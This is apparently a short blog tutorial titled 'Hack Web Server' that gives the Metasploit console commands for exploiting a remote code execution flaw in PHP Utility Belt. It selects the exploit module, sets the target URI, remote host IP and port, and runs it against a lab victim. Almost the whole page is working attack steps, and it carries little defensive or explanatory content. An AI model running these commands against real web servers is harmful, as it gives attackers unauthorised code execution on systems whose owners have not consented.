Hack Web Server using PHP Utility Belt Remote Code Execution

This module exploits remote code execution vulnerability in PHP Utility Belt, which is a set of tools for PHP developers and should not be installed in a production environment, since this application runs arbitrary PHP code as an intended functionality.

 Exploit Targets

PHP Utility Belt

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/http/php_utility_belt_rce

msf exploit (php_utility_belt_rce)>set targeturi /php-utility-belt-master/ajax.php

msf exploit (php_utility_belt_rce)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (php_utility_belt_rce)>set rport 80

msf exploit (php_utility_belt_rce)>exploit        

Leave a Reply

Your email address will not be published. Required fields are marked *